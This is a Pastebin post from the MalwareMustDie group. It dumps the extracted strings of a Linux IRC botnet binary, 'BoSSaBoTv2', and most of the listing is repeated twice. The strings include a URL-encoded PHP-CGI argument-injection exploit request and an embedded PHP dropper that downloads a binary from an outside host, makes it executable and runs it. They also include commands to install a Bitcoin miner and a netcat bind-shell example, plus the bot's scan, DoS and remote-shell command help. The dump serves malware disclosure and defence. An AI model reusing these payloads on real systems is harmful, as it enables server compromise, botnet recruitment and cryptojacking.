SHARE
TWEET

BossaBot Moar ELF IRC skids, #MalwareMustDie

MalwareMustDie Aug 26th, 2014 (edited) 358 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # Fur Malekal, ELF IRC skids, von #MalwareMustDie
  2. # Code: BossaBot
  3. # depacked bins:
  4. ---------
  5. 0000000000F4   /lib/ld-linux.so.2
  6. 00000000087D   libpthread.so.0
  7. 00000000088D   waitpid
  8. 00000000089A   connect
  9. 0000000008A2   pthread_exit
  10. 0000000008AF   pthread_create
  11. 0000000008BE   system
  12. 0000000008CA   accept
  13. 0000000008D1   write
  14. 0000000008E1   sendto
  15. 0000000008ED   sigaction
  16. 0000000008F7   __errno_location
  17. 000000000908   _Jv_RegisterClasses
  18. 00000000091C   libc.so.6
  19. 000000000926   strcpy
  20. 00000000092D   ioctl
  21. 000000000933   stdout
  22. 00000000093A   vsprintf
  23. 000000000943   strerror
  24. 00000000094C   snprintf
  25. 000000000955   __strtol_internal
  26. 000000000967   getpid
  27. 00000000096E   fgets
  28. 000000000974   memcpy
  29. 00000000097B   pclose
  30. 000000000987   malloc
  31. 00000000098E   sleep
  32. 000000000994   sysinfo
  33. 00000000099C   socket
  34. 0000000009A3   select
  35. 0000000009AA   fflush
  36. 0000000009B1   alarm
  37. 0000000009B7   popen
  38. 0000000009BD   calloc
  39. 0000000009C9   strcat
  40. 0000000009D5   inet_addr
  41. 0000000009DF   setsockopt
  42. 0000000009EA   strstr
  43. 0000000009F1   strncpy
  44. 0000000009F9   strcasecmp
  45. 000000000A04   __strdup
  46. 000000000A0D   bcopy
  47. 000000000A13   strtok
  48. 000000000A1A   listen
  49. 000000000A21   sscanf
  50. 000000000A28   inet_network
  51. 000000000A35   memset
  52. 000000000A3C   srand
  53. 000000000A42   getppid
  54. 000000000A4F   getcwd
  55. 000000000A56   gethostbyname
  56. 000000000A64   fgetc
  57. 000000000A6A   fclose
  58. 000000000A71   __ctype_b_loc
  59. 000000000A7F   access
  60. 000000000A86   __xstat
  61. 000000000A8E   inet_ntop
  62. 000000000A98   fopen
  63. 000000000A9E   _IO_stdin_used
  64. 000000000AAD   daemon
  65. 000000000AB4   __libc_start_main
  66. 000000000AC6   toupper
  67. 000000000ACE   strchr
  68. 000000000AD5   fputs
  69. 000000000ADB   mkdir
  70. 000000000AE1   vfprintf
  71. 000000000AEF   __gmon_start__
  72. 000000000AFE   GLIBC_2.1
  73. 000000000B08   GLIBC_2.0
  74. 000000000B12   GLIBC_2.3
  75. 000000001555   G    ]~4=
  76. 00000000177E   t,PRh
  77. 000000001DDE   Sj$h
  78. 00000000349F   YXj:S
  79. 000000003A1E   4$WSh
  80. 000000004F25   u&PSh
  81. 000000005D28   haxmedown.cz.cc
  82. 000000005D38   %s : USERID : UNIX : %s
  83. 000000005D51   NOTICE %s :Unknowning %s.
  84. 000000005D6C   NOTICE %s :Unable to comply.
  85. 000000005D8A   /cgi-bin/php
  86. 000000005D97   /cgi-bin/php5
  87. 000000005DA5   /cgi-bin/php-cgi
  88. 000000005DB6   /cgi-bin/php.cgi
  89. 000000005DC7   /cgi-bin/php4
  90. 000000005DD5   /cgi-bin/php5-cgi
  91. 000000005DE7   /cgi-bin/php4-cgi
  92. 000000005DF9   /cgi-bin/php5.cgi
  93. 000000005E0B   /cgi-bin/php4.cgi
  94. 000000005E1D   /cgi-bin/php52.cgi
  95. 000000005E30   /cgi-bin/php53.cgi
  96. 000000005E43   /cgi-bin/
  97. 000000005E4D   /cgi-sys/php-cgi
  98. 000000005E5E   /cgi-bin/info.php
  99. 000000005E70   /cgi-bin/php.fcgi
  100. 000000005E82   /cgi-bin/phpinfo.php
  101. 000000005E9C   Permission denied
  102. 000000005EAE   %d.%d.%d.%d
  103. 000000005EBA   %s.%i.%i.%i
  104. 000000005EC6   %s.%i.%i
  105. 000000005ECF   %s.%i
  106. 000000005ED5   NOTICE %s :              
  107. 000000005EF3   devchan
  108. 000000005F03   http://
  109. 000000005F0C   ./cache/
  110. 000000005F15   %s %s %s
  111. 000000005F22   HTTP/1.1
  112. 000000005F2B   HTTP/1.0
  113. 000000005F34   ./cache/%s
  114. 000000005F3F   Date:
  115. 000000005F45   HTTP/%f %d
  116. 000000005F50   %%%02X
  117. 000000005F57   %hu.%hu.%hu.%hu
  118. 000000005F67   UPDATE
  119. 000000005F6E   UNKNOWN
  120. 000000005F7B   SERVER
  121. 000000005F82   VERSION
  122. 000000005F8F   SCANRND
  123. 000000005F97   SCANSUBA
  124. 000000005FA0   SCANSUBB
  125. 000000005FA9   SCANSUBC
  126. 000000005FB7   SHELL
  127. 000000005FBD   PROXY
  128. 000000005FC3   SOCKS5
  129. 000000005FCA   MINER
  130. 000000005FD9   NOTICE %s :%s
  131. 000000005FF8   PRIVMSG
  132. 000000006005   TOPIC
  133. 00000000600B   /etc/init.d/rc.local
  134. 000000006020   "%s%s"
  135. 00000000602A   [sshd]
  136. 000000006036   ERROR
  137. 00000000603C   /etc/rc.conf
  138. 000000006049   rm -r /tmp/pool*
  139. 00000000605A   dummy
  140. 000000006060   4L2nJG5V
  141. 000000006069   NOTICE %s :UPDATEING
  142. 00000000607F   Linux
  143. 000000006085   NICK %s
  144. 00000000608E   NOTICE %s :NICK <nick>
  145. 0000000060A6   NOTICE %s :MOVE <server>
  146. 0000000060C0   MODE %s -x
  147. 0000000060CC   MODE %s +i
  148. 0000000060D8   JOIN %s :%s
  149. 0000000060E5   WHO %s
  150. 0000000060ED   PONG %s
  151. 000000006100   NOTICE %s :Removed all spoofs
  152. 000000006120   NOTICE %s :What kind of subnet address is that? Do something like: 169.40
  153. 000000006180   NOTICE %s :Unable to resolve %s
  154. 0000000061C0   NOTICE %s :UNKNOWN <target> <secs>
  155. 000000006200   POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%   0000000065DF      0   Host: %s
  156. 0000000065E9   User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
  157. 000000006638   Content-Type: application/x-www-form-urlencoded
  158. 000000006669   Content-Length: %d
  159. 00000000667D   Connection: close
  160. 0000000066A0   <?php
  161. 0000000066A6   $tmp = sys_get_temp_dir();
  162. 0000000066C1   $path = getcwd();
  163. 0000000066D3   $file = "4L2nJG5V";
  164. 0000000066E7   $url = "con32.cz.cc";
  165. 0000000066FD   $wget = "wget";
  166. 00000000670D   $flag = "-P - -O";
  167. 000000006720   $chmod = "chmod -R 777";
  168. 000000006739   if (file_exists($tmp . "/$file"))
  169. 00000000675D   exit(1);
  170. 000000006766   }else{
  171. 00000000676D   echo($tmp);
  172. 000000006779   system("$wget $url $flag" . $tmp . "/$file");
  173. 0000000067A7   system("$chmod" . $tmp ."/$file");
  174. 0000000067CA   chmod ($tmp."/".$file,0777);
  175. 0000000067E7   system($tmp . "/$file 2>&1");
  176. 000000006805   exit(1);
  177. 000000006820   /cgi-bin/php5.cgi-20120725_by_SAKUR
  178. 000000006860   /phpMyAdmin/config/config.inc.php
  179. 0000000068A0   /phpmyadmin/config/config.inc.php
  180. 0000000068E0   NOTICE %s :
  181. 0000000068FD   [EXPLOiTiNG-IP:-%s-]
  182. 000000006940   NOTICE %s :
  183. 00000000695D   [Permission-denied:-%s-]
  184. 0000000069A0   NOTICE %s :
  185. 0000000069B4   [RANDOM-SCAN-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]-TIME-[-%s-]
  186. 000000006A00   NOTICE %s :
  187. 000000006A14   [WAITING-OF-THREADS]
  188. 000000006A40   NOTICE %s :
  189. 000000006A54   [SCAN-DONE]
  190. 000000006A80   NOTICE %s :
  191. 000000006A94   [SCAN-RUNNING!!!]
  192. 000000006AC0   NOTICE %s :
  193. 000000006AD4   [SUBNET-SCAN-A-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  194. 000000006B20   NOTICE %s :
  195. 000000006B34   [WAITING-OF-THREADS]
  196. 000000006B60   NOTICE %s :
  197. 000000006B74   [SCAN-RUNNING!!!
  198. 000000006BA0   NOTICE %s :
  199. 000000006BB4   [SUBNET-SCAN-B-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  200. 000000006C00   NOTICE %s :
  201. 000000006C14   [SUBNET-SCAN-C-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  202. 000000006C60   NOTICE %s :
  203. 000000006CA0   NOTICE %s :              
  204. 000000006CC2     BoSSaBoTv2 by BoSSaLiNiE
  205. 000000006CE0   NOTICE %s :              
  206. 000000006D60   NOTICE %s :
  207. 000000006DA0   NOTICE %s :              
  208. 000000006DC2     HELP
  209. 000000006DE0   NOTICE %s :              
  210. 000000006DFC   PRIVAT PRIVAT PRIVAT
  211. 000000006E20   NOTICE %s :              
  212. 000000006E3C   ALL COMMMANDS STARTS WITH !BOSS* or !BOSS|[500]*
  213. 000000006E80   NOTICE %s :              
  214. 000000006E9C   OR THE COMPLETE BOT !NICKNAME FOR CONTROLL ONLY ONE BOT
  215. 000000006EE0   NOTICE %s :              
  216. 000000006EFC   example !BOSS* scanrnd 192.168 500 30
  217. 000000006F40   NOTICE %s :              
  218. 000000006F62     SCANNING
  219. 000000006F80   NOTICE %s :              
  220. 000000006F9C   SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
  221. 000000007000   NOTICE %s :              
  222. 00000000701C   SCANSUBA <192> <threads>                                  = Complete Subnet scan
  223. 000000007080   NOTICE %s :              
  224. 00000000709C   SCANSUBB <192.168> <threads>                              = Complete Subnet scan
  225. 000000007100   NOTICE %s :              
  226. 00000000711C   SCANSUBC <192.168.0> <threads>                            = Complete Subnet scan
  227. 000000007180   NOTICE %s :              
  228. 0000000071A2     DoS
  229. 0000000071C0   NOTICE %s :              
  230. 0000000071DC   UNKNOWN <target> <secs>
  231. 000000007200   NOTICE %s :              
  232. 00000000721C   NOTE YOU CANT STOP RUNNING SCANS
  233. 000000007240   NOTICE %s :              
  234. 000000007262     WARNING
  235. 000000007280   NOTICE %s :              
  236. 00000000729C   DO NOT ENTER MORE WHITE SPACES THAT ARE NEEDED
  237. 0000000072E0   NOTICE %s :              
  238. 0000000072FC   scanrnd 192.168.0   500 100 IS WRONG BOT WILL NOT SCAN
  239. 000000007340   NOTICE %s :              
  240. 00000000735C   scanrnd 192.168.0 500   100 IS WRONG BOT WILL NOT SCAN
  241. 0000000073A0   NOTICE %s :              
  242. 0000000073BC   scanrnd 192.168.0 500 100 IS RIGHT BOT WILL SCAN
  243. 000000007400   NOTICE %s :              
  244. 000000007422     REMOTE
  245. 000000007440   NOTICE %s :              
  246. 00000000745C   REMOTE CONTROLL SHELL
  247. 000000007480   NOTICE %s :              
  248. 00000000749C   !BOSS* SH uname -a
  249. 0000000074C0   NOTICE %s :              
  250. 0000000074DC   REMOTE CONTROLL IRC
  251. 000000007500   NOTICE %s :              
  252. 00000000751C   !BOSS* IRC join #bitchly
  253. 000000007540   NOTICE %s :              
  254. 00000000755C   REMOTE BIND SHELL
  255. 000000007580   NOTICE %s :              
  256. 00000000759C   !BOSS* SHELL
  257. 0000000075C0   NOTICE %s :              
  258. 0000000075DC   nc -vvn 192.168.0.1 31337
  259. 000000007600   NOTICE %s :              
  260. 000000007622     EOH
  261. 000000007640   NOTICE %s :
  262. 000000007654   GENERATING
  263. 000000007680   NOTICE %s :
  264. 000000007694   STARTING
  265. 0000000076C0   NOTICE %s :
  266. 0000000076D4   SOCKET
  267. 0000000076DD   CREATED
  268. 000000007700   NOTICE %s :
  269. 000000007740   NOTICE %s :
  270. 000000007754   WAITING
  271. 00000000775E   CONNECTION
  272. 000000007780   NOTICE %s :
  273. 000000007794   INCOMMING
  274. 0000000077A0   CONNECTION
  275. 0000000077C9   BoSSaBoTv2
  276. 0000000077D6   ACCESS
  277. 0000000077DF   GRANTED
  278. 000000007832   Enter password:
  279. 00000000786A   BoSSaBoTv2
  280. 000000007877   REMOTE
  281. 000000007880   SHELL
  282. 0000000078E0   NOTICE %s :
  283. 0000000078F4   DISCONNECTED
  284. 000000007960   NOTICE %s :
  285. 0000000079A0   NOTICE %s :
  286. 0000000079B4   SOCKET
  287. 0000000079BD   ERROR
  288. 0000000079E0   NOTICE %s :
  289. 0000000079F4   PROXY
  290. 0000000079FC   SERVER
  291. 000000007A05   READY
  292. 000000007A20   400 : BAD REQUEST
  293. 000000007A32   ONLY GET REQUESTS ARE ALLOWED
  294. 000000007A60   GET %s HTTP/1.0
  295. 000000007A71   Host: %s
  296. 000000007A7B   If-Modified-Since: %s
  297. 000000007A92   Connection: close
  298. 000000007AC0   GET %s HTTP/1.0
  299. 000000007AD1   Host: %s
  300. 000000007ADB   Connection: close
  301. 000000007B00   NOTICE %s :
  302. 000000007B14   SOCKS5
  303. 000000007B1D   SERVER
  304. 000000007B26   READY
  305. 000000007B33   PORT %d
  306. 000000007B40   export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
  307. 000000007B80   NICK %s
  308. 000000007B88   USER %s localhost localhost :%s
  309. 000000007BC0   /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
  310. 000000007C20   pkill minerd ; pkill m32 ; pkill m64
  311. 000000007C60   wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x86.tar.gz -P /tmp
  312. 000000007CC0   tar -zxf /tmp/pooler-cpuminer-2.4-linux-x86.tar.gz -C /tmp
  313. 000000007D00   NOTICE %s :BTC CPU Miner Running For %s:%s with User %s:%s
  314. 000000007D40   pkill %s ; pkill %s ; rm -r /tmp/%s ; rm -r /tmp/%s ; wget %s -P - -O /tmp/%s ; wget %s -P - -O /tmp/%s ; chmod 777 /tmp/%s ; chmod 777 /tmp/%s ; /tmp/%s ; /tmp/%s
  315. 000000007E00   NOTICE %s :
  316. 000000007E1D   BoSSaBoTv2-%s
  317. 000000007E60   NOTICE %s :Nick cannot be larger than 9 characters.
  318. 000000008361   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  319. 000000008394   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  320. 0000000083C7   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  321. 0000000083FA   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  322. 00000000842D   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  323. 000000008460   GCC: (GNU) 3.2.2 20030222 (Red Hat Linux 3.2.2-5)
  324. 000000008493   .shstrtab
  325. 00000000849D   .interp
  326. 0000000084A5   .note.ABI-tag
  327. 0000000084B3   .hash
  328. 0000000084B9   .dynsym
  329. 0000000084C1   .dynstr
  330. 0000000084C9   .gnu.version
  331. 0000000084D6   .gnu.version_r
  332. 0000000084E5   .rel.dyn
  333. 0000000084EE   .rel.plt
  334. 0000000084F7   .init
  335. 0000000084FD   .text
  336. 000000008503   .fini
  337. 000000008509   .rodata
  338. 000000008511   .eh_frame
  339. 00000000851B   .data
  340. 000000008521   .dynamic
  341. 00000000852A   .ctors
  342. 000000008531   .dtors
  343. 000000008547   .comment
  344. 0000000000F4   /lib/ld-linux.so.2
  345. 00000000087D   libpthread.so.0
  346. 00000000088D   waitpid
  347. 00000000089A   connect
  348. 0000000008A2   pthread_exit
  349. 0000000008AF   pthread_create
  350. 0000000008BE   system
  351. 0000000008CA   accept
  352. 0000000008D1   write
  353. 0000000008E1   sendto
  354. 0000000008ED   sigaction
  355. 0000000008F7   __errno_location
  356. 000000000908   _Jv_RegisterClasses
  357. 00000000091C   libc.so.6
  358. 000000000926   strcpy
  359. 00000000092D   ioctl
  360. 000000000933   stdout
  361. 00000000093A   vsprintf
  362. 000000000943   strerror
  363. 00000000094C   snprintf
  364. 000000000955   __strtol_internal
  365. 000000000967   getpid
  366. 00000000096E   fgets
  367. 000000000974   memcpy
  368. 00000000097B   pclose
  369. 000000000987   malloc
  370. 00000000098E   sleep
  371. 000000000994   sysinfo
  372. 00000000099C   socket
  373. 0000000009A3   select
  374. 0000000009AA   fflush
  375. 0000000009B1   alarm
  376. 0000000009B7   popen
  377. 0000000009BD   calloc
  378. 0000000009C9   strcat
  379. 0000000009D5   inet_addr
  380. 0000000009DF   setsockopt
  381. 0000000009EA   strstr
  382. 0000000009F1   strncpy
  383. 0000000009F9   strcasecmp
  384. 000000000A04   __strdup
  385. 000000000A0D   bcopy
  386. 000000000A13   strtok
  387. 000000000A1A   listen
  388. 000000000A21   sscanf
  389. 000000000A28   inet_network
  390. 000000000A35   memset
  391. 000000000A3C   srand
  392. 000000000A42   getppid
  393. 000000000A4F   getcwd
  394. 000000000A56   gethostbyname
  395. 000000000A64   fgetc
  396. 000000000A6A   fclose
  397. 000000000A71   __ctype_b_loc
  398. 000000000A7F   access
  399. 000000000A86   __xstat
  400. 000000000A8E   inet_ntop
  401. 000000000A98   fopen
  402. 000000000A9E   _IO_stdin_used
  403. 000000000AAD   daemon
  404. 000000000AB4   __libc_start_main
  405. 000000000AC6   toupper
  406. 000000000ACE   strchr
  407. 000000000AD5   fputs
  408. 000000000ADB   mkdir
  409. 000000000AE1   vfprintf
  410. 000000000AEF   __gmon_start__
  411. 000000000AFE   GLIBC_2.1
  412. 000000000B08   GLIBC_2.0
  413. 000000000B12   GLIBC_2.3
  414. 000000001555   G    ]~4=
  415. 00000000177E   t,PRh
  416. 000000001DDE   Sj$h
  417. 00000000349F   YXj:S
  418. 000000003A1E   4$WSh
  419. 000000004F25   u&PSh
  420. 000000005D28   haxmedown.cz.cc
  421. 000000005D38   %s : USERID : UNIX : %s
  422. 000000005D51   NOTICE %s :Unknowning %s.
  423. 000000005D6C   NOTICE %s :Unable to comply.
  424. 000000005D8A   /cgi-bin/php
  425. 000000005D97   /cgi-bin/php5
  426. 000000005DA5   /cgi-bin/php-cgi
  427. 000000005DB6   /cgi-bin/php.cgi
  428. 000000005DC7   /cgi-bin/php4
  429. 000000005DD5   /cgi-bin/php5-cgi
  430. 000000005DE7   /cgi-bin/php4-cgi
  431. 000000005DF9   /cgi-bin/php5.cgi
  432. 000000005E0B   /cgi-bin/php4.cgi
  433. 000000005E1D   /cgi-bin/php52.cgi
  434. 000000005E30   /cgi-bin/php53.cgi
  435. 000000005E43   /cgi-bin/
  436. 000000005E4D   /cgi-sys/php-cgi
  437. 000000005E5E   /cgi-bin/info.php
  438. 000000005E70   /cgi-bin/php.fcgi
  439. 000000005E82   /cgi-bin/phpinfo.php
  440. 000000005E9C   Permission denied
  441. 000000005EAE   %d.%d.%d.%d
  442. 000000005EBA   %s.%i.%i.%i
  443. 000000005EC6   %s.%i.%i
  444. 000000005ECF   %s.%i
  445. 000000005ED5   NOTICE %s :              
  446. 000000005EF3   devchan
  447. 000000005F03   http://
  448. 000000005F0C   ./cache/
  449. 000000005F15   %s %s %s
  450. 000000005F22   HTTP/1.1
  451. 000000005F2B   HTTP/1.0
  452. 000000005F34   ./cache/%s
  453. 000000005F3F   Date:
  454. 000000005F45   HTTP/%f %d
  455. 000000005F50   %%%02X
  456. 000000005F57   %hu.%hu.%hu.%hu
  457. 000000005F67   UPDATE
  458. 000000005F6E   UNKNOWN
  459. 000000005F7B   SERVER
  460. 000000005F82   VERSION
  461. 000000005F8F   SCANRND
  462. 000000005F97   SCANSUBA
  463. 000000005FA0   SCANSUBB
  464. 000000005FA9   SCANSUBC
  465. 000000005FB7   SHELL
  466. 000000005FBD   PROXY
  467. 000000005FC3   SOCKS5
  468. 000000005FCA   MINER
  469. 000000005FD9   NOTICE %s :%s
  470. 000000005FF8   PRIVMSG
  471. 000000006005   TOPIC
  472. 00000000600B   /etc/init.d/rc.local
  473. 000000006020   "%s%s"
  474. 00000000602A   [sshd]
  475. 000000006036   ERROR
  476. 00000000603C   /etc/rc.conf
  477. 000000006049   rm -r /tmp/pool*
  478. 00000000605A   dummy
  479. 000000006060   4L2nJG5V
  480. 000000006069   NOTICE %s :UPDATEING
  481. 00000000607F   Linux
  482. 000000006085   NICK %s
  483. 00000000608E   NOTICE %s :NICK <nick>
  484. 0000000060A6   NOTICE %s :MOVE <server>
  485. 0000000060C0   MODE %s -x
  486. 0000000060CC   MODE %s +i
  487. 0000000060D8   JOIN %s :%s
  488. 0000000060E5   WHO %s
  489. 0000000060ED   PONG %s
  490. 000000006100   NOTICE %s :Removed all spoofs
  491. 000000006120   NOTICE %s :What kind of subnet address is that? Do something like: 169.40
  492. 000000006180   NOTICE %s :Unable to resolve %s
  493. 0000000061C0   NOTICE %s :UNKNOWN <target> <secs>
  494. 000000006200   POST %s?%%2D%%64+%%61%%6C%%6C%%6F%%77%%5F%%75%%72%%6C%%5F%%69%%6E%%63%%6C%%75%%64%%65%%3D%%6F%%6E+%%2D%%64+%%73%%61%%66%%65%%5F%%6D%%6F%%64%%65%%3D%%6F%%66%%66+%%2D%%64+%%73%%75%%68%%6F%%73%%69%%6E%%2E%%73%%69%%6D%%75%%6C%%61%%74%%69%%6F%%6E%%3D%%6F%%6E+%%2D%%64+%%64%%69%%73%%61%%62%%6C%%65%%5F%%66%%75%%6E%%63%%74%%69%%6F%%6E%%73%%3D%%22%%22+%%2D%%64+%%6F%%70%%65%%6E%%5F%%62%%61%%73%%65%%64%%69%%72%%3D%%6E%%6F%%6E%%65+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%%64+%%63%%67%%69%%2E%%66%%6F%%72%%63%%65%%5F%%72%%65%%64%%69%%72%%65%%63%%74%%3D%%30+%%2D%%64+%%63%%67%%69%%2E%%72%%65%%64%%69%%72%%65%%63%%74%%5F%%73%%74%%61%%74%%75%%73%%5F%%65%%6E%%76%%3D%%22%%79%%65%%73%%22+%%2D%%64+%%63%%67%%69%%2E%%66%%69%%78%%5F%%70%%61%%74%%68%%69%%6E%%66%%6F%%3D%%31+%%2D%%64+%%61%%75%%74%%6F%%5F%%70%%72%%65%%70%%65%%6E%%64%%5F%%66%%69%%6C%%65%%3D%%70%%68%%70%%3A%%2F%%2F%%69%%6E%%70%%75%%74+%%2D%   0000000065DF      0   Host: %s
  495. 0000000065E9   User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0
  496. 000000006638   Content-Type: application/x-www-form-urlencoded
  497. 000000006669   Content-Length: %d
  498. 00000000667D   Connection: close
  499. 0000000066A0   <?php
  500. 0000000066A6   $tmp = sys_get_temp_dir();
  501. 0000000066C1   $path = getcwd();
  502. 0000000066D3   $file = "4L2nJG5V";
  503. 0000000066E7   $url = "con32.cz.cc";
  504. 0000000066FD   $wget = "wget";
  505. 00000000670D   $flag = "-P - -O";
  506. 000000006720   $chmod = "chmod -R 777";
  507. 000000006739   if (file_exists($tmp . "/$file"))
  508. 00000000675D   exit(1);
  509. 000000006766   }else{
  510. 00000000676D   echo($tmp);
  511. 000000006779   system("$wget $url $flag" . $tmp . "/$file");
  512. 0000000067A7   system("$chmod" . $tmp ."/$file");
  513. 0000000067CA   chmod ($tmp."/".$file,0777);
  514. 0000000067E7   system($tmp . "/$file 2>&1");
  515. 000000006805   exit(1);
  516. 000000006820   /cgi-bin/php5.cgi-20120725_by_SAKUR
  517. 000000006860   /phpMyAdmin/config/config.inc.php
  518. 0000000068A0   /phpmyadmin/config/config.inc.php
  519. 0000000068E0   NOTICE %s :
  520. 0000000068FD   [EXPLOiTiNG-IP:-%s-]
  521. 000000006940   NOTICE %s :
  522. 00000000695D   [Permission-denied:-%s-]
  523. 0000000069A0   NOTICE %s :
  524. 0000000069B4   [RANDOM-SCAN-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]-TIME-[-%s-]
  525. 000000006A00   NOTICE %s :
  526. 000000006A14   [WAITING-OF-THREADS]
  527. 000000006A40   NOTICE %s :
  528. 000000006A54   [SCAN-DONE]
  529. 000000006A80   NOTICE %s :
  530. 000000006A94   [SCAN-RUNNING!!!]
  531. 000000006AC0   NOTICE %s :
  532. 000000006AD4   [SUBNET-SCAN-A-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  533. 000000006B20   NOTICE %s :
  534. 000000006B34   [WAITING-OF-THREADS]
  535. 000000006B60   NOTICE %s :
  536. 000000006B74   [SCAN-RUNNING!!!
  537. 000000006BA0   NOTICE %s :
  538. 000000006BB4   [SUBNET-SCAN-B-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  539. 000000006C00   NOTICE %s :
  540. 000000006C14   [SUBNET-SCAN-C-STARTED]-SUBNET-[-%s-]-THREADS-[-%s-]
  541. 000000006C60   NOTICE %s :
  542. 000000006CA0   NOTICE %s :              
  543. 000000006CC2     BoSSaBoTv2 by BoSSaLiNiE
  544. 000000006CE0   NOTICE %s :              
  545. 000000006D60   NOTICE %s :
  546. 000000006DA0   NOTICE %s :              
  547. 000000006DC2     HELP
  548. 000000006DE0   NOTICE %s :              
  549. 000000006DFC   PRIVAT PRIVAT PRIVAT
  550. 000000006E20   NOTICE %s :              
  551. 000000006E3C   ALL COMMMANDS STARTS WITH !BOSS* or !BOSS|[500]*
  552. 000000006E80   NOTICE %s :              
  553. 000000006E9C   OR THE COMPLETE BOT !NICKNAME FOR CONTROLL ONLY ONE BOT
  554. 000000006EE0   NOTICE %s :              
  555. 000000006EFC   example !BOSS* scanrnd 192.168 500 30
  556. 000000006F40   NOTICE %s :              
  557. 000000006F62     SCANNING
  558. 000000006F80   NOTICE %s :              
  559. 000000006F9C   SCANRND <192 or 192.168 or 192.168.0> <threads> <minutes> = Random Scan
  560. 000000007000   NOTICE %s :              
  561. 00000000701C   SCANSUBA <192> <threads>                                  = Complete Subnet scan
  562. 000000007080   NOTICE %s :              
  563. 00000000709C   SCANSUBB <192.168> <threads>                              = Complete Subnet scan
  564. 000000007100   NOTICE %s :              
  565. 00000000711C   SCANSUBC <192.168.0> <threads>                            = Complete Subnet scan
  566. 000000007180   NOTICE %s :              
  567. 0000000071A2     DoS
  568. 0000000071C0   NOTICE %s :              
  569. 0000000071DC   UNKNOWN <target> <secs>
  570. 000000007200   NOTICE %s :              
  571. 00000000721C   NOTE YOU CANT STOP RUNNING SCANS
  572. 000000007240   NOTICE %s :              
  573. 000000007262     WARNING
  574. 000000007280   NOTICE %s :              
  575. 00000000729C   DO NOT ENTER MORE WHITE SPACES THAT ARE NEEDED
  576. 0000000072E0   NOTICE %s :              
  577. 0000000072FC   scanrnd 192.168.0   500 100 IS WRONG BOT WILL NOT SCAN
  578. 000000007340   NOTICE %s :              
  579. 00000000735C   scanrnd 192.168.0 500   100 IS WRONG BOT WILL NOT SCAN
  580. 0000000073A0   NOTICE %s :              
  581. 0000000073BC   scanrnd 192.168.0 500 100 IS RIGHT BOT WILL SCAN
  582. 000000007400   NOTICE %s :              
  583. 000000007422     REMOTE
  584. 000000007440   NOTICE %s :              
  585. 00000000745C   REMOTE CONTROLL SHELL
  586. 000000007480   NOTICE %s :              
  587. 00000000749C   !BOSS* SH uname -a
  588. 0000000074C0   NOTICE %s :              
  589. 0000000074DC   REMOTE CONTROLL IRC
  590. 000000007500   NOTICE %s :              
  591. 00000000751C   !BOSS* IRC join #bitchly
  592. 000000007540   NOTICE %s :              
  593. 00000000755C   REMOTE BIND SHELL
  594. 000000007580   NOTICE %s :              
  595. 00000000759C   !BOSS* SHELL
  596. 0000000075C0   NOTICE %s :              
  597. 0000000075DC   nc -vvn 192.168.0.1 31337
  598. 000000007600   NOTICE %s :              
  599. 000000007622     EOH
  600. 000000007640   NOTICE %s :
  601. 000000007654   GENERATING
  602. 000000007680   NOTICE %s :
  603. 000000007694   STARTING
  604. 0000000076C0   NOTICE %s :
  605. 0000000076D4   SOCKET
  606. 0000000076DD   CREATED
  607. 000000007700   NOTICE %s :
  608. 000000007740   NOTICE %s :
  609. 000000007754   WAITING
  610. 00000000775E   CONNECTION
  611. 000000007780   NOTICE %s :
  612. 000000007794   INCOMMING
  613. 0000000077A0   CONNECTION
  614. 0000000077C9   BoSSaBoTv2
  615. 0000000077D6   ACCESS
  616. 0000000077DF   GRANTED
